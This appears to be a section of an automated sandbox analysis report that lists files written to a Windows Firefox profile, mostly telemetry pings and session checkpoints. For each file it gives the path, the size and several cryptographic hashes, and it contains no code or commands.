SHA5124c5ce6d67e305e31bf33c0959283b9059d6a4883d83e8d4a27f8530404c6829a4f7170ef695ff555b7381557732619b52c55438b1fdfaa58b32080b82ea0b3ab
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\events\events
Filesize1KB
MD5fcacbed013aaae0d07726a299917898c
SHA1d4c8fb0bf3a26e410e6fbfe19539257724542041
SHA25600707cf68763691e67458ab1b9719e0d9edba6728b41cfd3077280e87b2eac56
SHA5123eb679849885bb616346019f0c9292679e205c674a49d2214f39ba078d476aeab7f567f628b2627629e1eda96102b352399c7572f12dcc0d12898ef66b925f7d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\098891e5-cbd2-4199-a0de-8b1b78811856
Filesize7KB
MD512dfb026da0387848c8f65cece7dd783
SHA13f363aad2c94a231ba778c4e23bd61f9134fda16
SHA2563d28c1844433d20ca42d457da263ed7ac6124ae05901b7f0b18384dba0d4fa59
SHA5125439510b2b0f851c2e7de7ea9530daed2092beaaabaa27952e2c781187f580fcc91c28eacbf3c8623a68b6c8eee47eb8ae8bd430cfc3196b94162da8fb003404
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\13ae0a60-a888-4041-9067-0106c2f23d2f
Filesize2KB
MD5009995b289eefd034feee1994d0b459f
SHA1e843920f7e23866167b0f5804ea283166cc1c8b8
SHA256d77c252a3c3d81ebe0c4614dff903080afa0af8cecb357076667defa97b2db14
SHA512fe3f92c8a5e45696f2a90686285e839be2a3b6a40a220b22c9fe672b34a58d65190f2ac4ef0c350f5ac5360797235233e888914f9e8dcb019bfd73c99edb181c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\5a00a9e7-27fe-477d-9c84-9aeef71ea443
Filesize235B
MD516318fa7a4ea4688bf7577c73a29b18c
SHA1371ad3a2df08f57f0368e19c90010b464d12f607
SHA2560d87090548e7e5c99aae4a701613c886ec434d021ae0d0dff836886ad9bdf7e2
SHA512e1ca7faa1efba350c4485affc9d9137536f2e4ec6df60473890ece524900242166066ec7702f4123b78b94f422f9ded7bfe56d8b5749b36d5c5693071717eac6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\619e2e4e-1ee8-473f-aa7f-8daa2002e985
Filesize886B
MD5dc75dd1dc864f1ff83d37e80ffb36a8a
SHA153c485688bf98163426e9297773e4536ce743dd8
SHA2560216f1223481bf2e0913b72455733892ca51e0c856280fafd9a84977593189fa
SHA51254f549fed7e51980b835bf4e8ad5e1b8ab7577b84af2da67c8283221673741be0831dc6c5d2084d46a3ff036fce66a890614a1644bdf43389e6079bd52d6c78e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\aed19d31-cd8f-42d9-a2cd-011d37dc731c
Filesize235B
MD5fd25acbc93a16714d042599cdd461602
SHA176af4b52859f63481a32a1aa8e9db8f1c9608efd
SHA2563576e3245633e82ee505446ebcf60a9ac32b71d310b03d5634962ba950966120
SHA5125dbd520170e8f7bba49e0eeb7763ece80df2fb3cf2f90a43e705ba5a7b268f23e8171558d91a06318adf24b955de6d14dde5207bf2d74a075678e597532ef107
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\dbee86e1-98a1-438a-87b9-1c6cd5e63ae6
Filesize16KB
MD514956115b6545a9ca9fbd3810cc1a027
SHA112100cff14ffa27b5b74906b75d09a848559af2b
SHA256788b2abcc4fae18858d05769a952f5d672d426a4f511498d824df46bd198d271
SHA512e9d070bebb4513d230f1f92e5ef3b71811c39734392361b81856f95885a72db4b45bbbb09d1821f0f91fb445a1c62a0b01dfd2153c352c0fc80cf7c1c7545a0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\f97d2892-df15-450f-b2ac-8eb7aba154b0
Filesize883B
MD51182aa37048ba2120173f0b76da3aa74
SHA10383a3c1f1cca635e520b672a877549d268f1146
SHA25661b326afe41ccac1dcfb543eefb1a26cdbc082f643ed2e0f49f5c1b46f28878a
SHA512788a8b7a49878b482eed3d2175395f2ed2e4056f79b5138991e9f172c3dd0f47167ddb2896b44a2c4a64a0982dc6c1b53fbc622d8eab0fdef5305c564b7bebb6
-
Filesize
6KB
MD54b526b5faf85976acd003715d43a9562
SHA127a9feaf332e4623f0c57a7054c805486b7d106d
SHA25618dd61b31b94ee298d83a3320682dc8f813663c6e97df9ef36a6a83f53237b82
SHA512f77c078953f0b44353efa055ea476a8517bc95033c063c7d231680f5a09c4b6d7556f002c04beb72d8cea2134092d2ddf32022be4337fee914e8cddc3440fcc3
-
Filesize
6KB
MD55fc52866087a9c690ccb9789f922fd09
SHA1b368f4a4ebd0ec5434a220bd283feb70a00a9f45
SHA256a1d7340af91bef8e434a24d551535c89318d29f46978dcbc6433e5556504ae42
SHA51204c8bd0aaf65f91758a1cbfda49db34c306eaf5fcf8496f7573eb9f9021abad7e2ce627d7f2a6fed69e76e8c47b812d8088b0d23a98a0e8af4741293a4ce3984
-
Filesize
6KB
MD50f71afa493720304ae5cf37aa2c1aea4
SHA1f16c588c2fadf9b32f812d92d9fac4700b4e27e9
SHA2561ecc90de71e613e3ec819ffcc547fa0980a9600656685e144ae16d972dd564e1
SHA5120ab685a52877a00f00fc6b93d8bedce09122b16c709a37c4341ce34762166d37788a83e94a4fd0d3f6e2f360f2074eeb46c48a12b43a0cdf0c2fa37d06b787d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\sessionCheckpoints.json
Filesize193B
MD52ad4fe43dc84c6adbdfd90aaba12703f
SHA128a6c7eff625a2da72b932aa00a63c31234f0e7f
SHA256ecb4133a183cb6c533a1c4ded26b663e2232af77db1a379f9bd68840127c7933
SHA5122ee947dcf3eb05258c7a8c45cb60082a697dbe6d683152fe7117d20f7d3eb2beaaf5656154b379193cdc763d7f2f3b114cf61b4dd0f8a65326e662165ccf89cc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\sessionCheckpoints.json.tmp
Filesize259B
MD5e6c20f53d6714067f2b49d0e9ba8030e
SHA1f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA25650a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf
-
Filesize
368KB
MD5990442d764ff1262c0b7be1e3088b6d3
SHA10b161374074ef2acc101ed23204da00a0acaa86e
SHA2566c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4
SHA512af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4
-
Filesize
355KB
MD59cfe1ced0752035a26677843c0cbb4e3
SHA1e8833ac499b41beb6763a684ba60333cdf955918
SHA2563bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA51229e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD566522d67917b7994ddfb5647f1c3472e
SHA1f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA2565da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968